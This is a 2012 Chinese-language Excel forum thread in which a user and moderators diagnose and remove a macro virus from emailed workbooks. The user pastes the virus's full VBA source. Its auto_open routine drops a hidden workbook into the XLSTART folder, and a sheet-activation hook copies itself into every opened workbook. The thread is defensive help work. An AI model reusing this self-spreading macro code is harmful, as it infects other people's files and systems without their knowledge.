標題: 無法消除巨集 [打印本頁]

作者: PJChen    時間: 2012-6-1 15:43     標題: 無法消除巨集

您好:
我收到分公司寄來的檔案,其中含有巨集及一個隱藏檔"1006ㄗ?ㄘ",     [attach]11214[/attach]
現在關啟Excel使用時會一直出現對話框  [attach]11213[/attach]
而且將Excel關閉時無法真正關閉,必須關二次才行,
請關我要如何使這個巨集消失?
作者: chin15    時間: 2012-6-1 17:32

跟著圖上的路徑找到元兇刪掉就行了。
註:資料夾選項必須選擇顯示所有檔案
作者: PJChen    時間: 2012-6-1 21:19

回復 2# chin15
問題就是找不到!且這個檔案是別人寄給我的,上面的路徑怎會有這個檔?
作者: HUNGCHILIN    時間: 2012-6-1 21:57

執行下述巨集 刪掉所開啟資料夾裡面的檔案

Sub StartupPathA()

On Error GoTo Error1
Dim mySh As Shell32.Shell
Set mySh = CreateObject("Shell.Application")
mySh.Explore Application.StartupPath  '任意的資料夾
Set mySh = Nothing  '物件的釋放
Error1: End Sub
作者: PJChen    時間: 2012-6-1 22:34

[attach]11218[/attach][attach]11218[/attach]回復 4# HUNGCHILIN

以下是檔案中的巨集,但我將它刪除後,還是會一直出現前面所提的對話框,"1006ㄗ攣ㄘ.xls"這個檔是在對別人的電腦中,不是在我的電腦裡, 附件有三個sheet,每點選一個sheet,就會一直出現對話框.  [attach]11218[/attach]
我現在想做的如下:
1) 如果一個資料夾中,我存放了很多這樣的檔,它可以只刪除巨集,但檔案保留嗎?因為是有用的資料.
2) 刪除以下指明的 "1006ㄗ攣ㄘ.xls"  我第一次關掉excel後,excel不會整個關閉,而只是像關掉檔案的情形,第二次到檢視>取消隱藏視窗,就會出現另一個對話框,如果按確認就會開出一個空白的sheet , 所以我覺得它隱藏在每個收到的檔案中    [attach]11219[/attach]
需要再按一次關閉才會真正關掉excel.
  1. Sub auto_open()
  2.   On Error Resume Next
  3.   If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls") = "" Then
  4.     Application.ScreenUpdating = False
  5.     ThisWorkbook.Sheets("StartUp").Copy
  6.     ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "1006ㄗ攣ㄘ.xls")
  7.     n$ = ActiveWorkbook.Name
  8.     ActiveWindow.Visible = False
  9.     Workbooks("1006ㄗ攣ㄘ.xls").Save
  10.     Workbooks(n$).Close (False)
  11.   End If
  12.   Application.OnSheetActivate = "1006ㄗ攣ㄘ.xls!acop"

13. End Sub

14. Sub acop()
  15.   On Error Resume Next
  16.   If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
  17.     Application.ScreenUpdating = False
  18.     n$ = ActiveSheet.Name
  19.     Workbooks("1006ㄗ攣ㄘ.xls").Sheets("StartUp").Copy before:=Worksheets(1)
  20.     Sheets(n$).Select
  21.   End If
  22. End Sub
複製代碼

作者: oobird    時間: 2012-6-1 23:00

在哪中的病毒?附件傳上來包準害了很多人!
用這個附件清除一下。
清除後沒問題了記得回來把這個有病毒的附件刪除!
[attach]11220[/attach]
作者: PJChen    時間: 2012-6-1 23:15

回復 6# oobird
不好意思,我不知道它是病毒,請問我放上去的檔要怎麼刪?
另外我前面提到的問題是否能解決?
作者: PJChen    時間: 2012-6-1 23:24

回復 6# oobird

我打開你提供的檔案,它就閃了一下,這樣是否有用?
upload的檔案我找不到地方可以前除,可以幫我刪嗎?或者是否我沒有權限?
我的檔案是經由email收到的,我要怎樣除去email及檔案的毒?
另外前面提到的問題能否解決?
作者: oobird    時間: 2012-6-1 23:25

運行過我的附件了嗎?其實前面每一樓講的都對。
就是要把Startup資料夾清空
二樓告訴妳的是手動刪除,循著路徑會找到的,只要設定顯示隱藏的檔案及資料夾會找得到的
阿吉是用程式直接開啟該資料夾,妳可以自行手動刪除
我的附件是替妳刪除,如此而已。
先解決這個隨機開啟的病毒再說!
作者: oobird    時間: 2012-6-1 23:30

閃了一下應該就行了。現在開啟新的excel檔案還會有不明的工作表或隱藏的活頁簿嗎?
作者: PJChen    時間: 2012-6-1 23:41

回復 10# oobird

我剛才除了用你提供的掃毒程式外,也用Avast掃一次資料夾,都說沒有毒,但1樓及5樓的對話框還是存在的,前面所提的情形也都相同,我可以怎麼做呢?
另外我發問時upload的檔案可否也幫忙刪除?因為檔案是相同情形我想也是有毒的.
謝謝您!
作者: oobird    時間: 2012-6-1 23:55

把這個檔案解壓後放在該路徑的xlstartup資料夾中試試,應該會清除每次開啟的檔案中的病毒。剛剛把妳那有毒的附件刪了無法再下載來測試。
可能許多檔案都有這個病毒,如果有用就[attach]11221[/attach]一段時間確定每個可能感染的檔案都開過再移除。
注意是一樓附圖的路徑。
作者: HUNGCHILIN    時間: 2012-6-1 23:56

我並沒有在一樓看到毒

如果一直出現肯定檔案沒有消除

請關閉所有EXCEL後 再嘗試使用oobird 超級版主給的BAT檔
作者: PJChen    時間: 2012-6-2 00:23

回復 12# oobird
回復 13# HUNGCHILIN

不好意思,我想問清楚些,以防我做錯動作.
1) C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\1006ㄗ攣ㄘ,我已經找到這個檔也cancel了.
2) 將刪xlstart病毒.bat 放在C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART 中,若是有人又給我這個路徑的毒,這時它會自動刪除?我剛試了一下,好像真的實施2) 的程序後,現在開啟檔案跟之前不同了.
3) 4樓的程式是將C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\1006ㄗ攣ㄘ刪除,不過5樓的巨集仍存在檔案中,這個巨集是怎麼跑到excel中的?有沒有一種程式可以刪除它?但我只要刪除這個巨集,檔案要保留,同時因為檔案有很多個,一個一個刪太多動作了,如果我將我懷疑有這個巨集的檔案,都放在"TTT"資料夾中,有沒有什麼程式可以一次將資料夾中的奇怪巨集一次性的刪除?
作者: PJChen    時間: 2012-6-2 00:36

回復 12# oobird
不好意思剛才14樓所提出的問題只在我刪除了"1006ㄗ攣ㄘ"後短暫的消失,而且我現在開啟excel都會先出現[attach]11222[/attach]
然後我再到C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\查看,結果還是存在著"1006ㄗ攣ㄘ"這個檔,即使我將它刪除了,一但我開啟了那些存在著奇怪巨集的檔案,"1006ㄗ攣ㄘ"還是會再次出現,而且我在5樓提到的問題,也都還是出現.
作者: PJChen    時間: 2012-6-2 01:04

回復 4# HUNGCHILIN

請問你的巨集要怎麼使用?我想應該不是放在每個有奇怪巨集的檔案中,這樣太費事了,但將它放在另一個excel檔案中,結果又不能用! 請指導.
[attach]11223[/attach]
作者: oobird    時間: 2012-6-2 09:21

2) 將刪xlstart病毒.bat 放在C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART 中,
12樓昨晚放錯檔了,要excel文件放在那裡才會自產生作用,附件已更換。
作者: PJChen    時間: 2012-6-2 11:10

回復 17# oobird
我將檔案換上你現在所提供的,但會有下列情形,請幫忙看看是否能解決?
1) 打開某些含病毒的檔,"清除StartUp.xls"將病毒清除後,所打開的檔會替換成清除StartUp.xls的巨集,有沒有一種方式可以清除病毒後,也不要將清除StartUp.xls的巨集留在所開的檔案中,也就是所要使打開的檔案不含巨集,因為它既然是掃毒,如果是將所有巨集清除是否也可以呢?
2) 第二種情形的檔案是打開後"清除StartUp.xls"它會說掃毒完了,但原先有毒的巨集仍存在,清除StartUp.xls的巨集也存在,在C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\中還是會有1006ㄗ攣ㄘ.xls這個檔,我將這個檔upload,其它人若沒有掃毒程式請不要download  [attach]11228[/attach]
3) 上述第二種情是想請你幫忙看看這樣是否正常?但我也希望最終處理能像 1) 的說明那樣: 使打開的檔案不含巨集,因為它既然是掃毒,如果是將所有巨集清除是否也可以呢?
作者: HUNGCHILIN    時間: 2012-6-2 18:05

這只是一個很常見且簡單的感染程式.沒有破壞性
#18樓有看到StartUp感染程式了, 不過我要關掉PC-cillin 2011 雲端版才看的到
你現在要做的步驟是:

*先用上述方法消除應用程式中的感染檔.將感染程式從xlstartup資料夾中刪除
-----------------------------------------------------------
*先利用應用程式關閉所有巨集
1.[attach]11231[/attach]
2.[attach]11232[/attach][attach]11232[/attach]
3.[attach]11233[/attach]
-----------------------------------------------------------
*如果沒有掃毒程式,要1個1個刪除受到感染的個別EXCEL檔
1.開啟受到感染的個別EXCEL檔,進入VB編輯器(可能有很多個要一個來.上述已經關掉巨集所以不用怕他感染其檔案,放心開啟)
2.如果看到StartUp模組 刪掉此模組就可以
[attach]11234[/attach]
作者: PJChen    時間: 2012-6-2 19:30

回復 19# HUNGCHILIN
版主, 您好
要手動刪除巨集我會使用,但我問的不是這個,我想你沒看懂我要問的:
1) C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\   正常情形下是否應該沒有任何檔案?
2) 我將你提供的程式放在Excel的巨集中,但它不能run,我想知道如何讓它自動將以下路徑所存在的檔案刪除?這樣是否就把病毒給刪了?
C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\
作者: HUNGCHILIN    時間: 2012-6-3 00:27

回復 20# PJChen
針對你的問題
1.C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\  路徑在 正常情形下沒有任何檔案
2.我提供的程式放在Excel的巨集中,執行後會開啟 C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\ 資料夾,讓你看到裡面但不會刪除任何檔案,要你自己刪除

照理說刪了C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\ 就完成了
要不然你測試先刪除C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\  路徑 下的檔案,再重開新檔(不要開你的舊檔案)
可以保證一切正常,C:\Users\PJ\AppData\Roaming\Microsoft\Excel\XLSTART\  會是空的,這時是正常的

但你很多檔案可能多已感染,你又把她打開,EXCEL軟體又感染一次,你會一直在重複在那邊感染 繞不出去.你有照我說的做了嗎?
肯定沒有.要不然怎麼可能會又繞不出來

若沒有相應防毒軟體,請老實按照我上述的做法做一遍,才不會直在重複在那邊繞 繞不出去

若依照你18樓的說法你完全不要巨集了,建議你若找不到到底哪幾個有感染你可以:
*先利用應用程式關閉所有巨集(上面有教)
然後要給別人前,將舊檔案另存成.XLSX檔格式就不會再有巨集,當然也不會有感染程式傳給別人

或許是上述講的不是很清楚要不然這麼簡單的問題,也不會回這麼多帖
作者: PJChen    時間: 2012-6-3 08:36

回復 21# HUNGCHILIN

謝謝版主,我明白你的話.

歡迎光臨 麻辣家族討論版版 (http://forum.twbts.com/)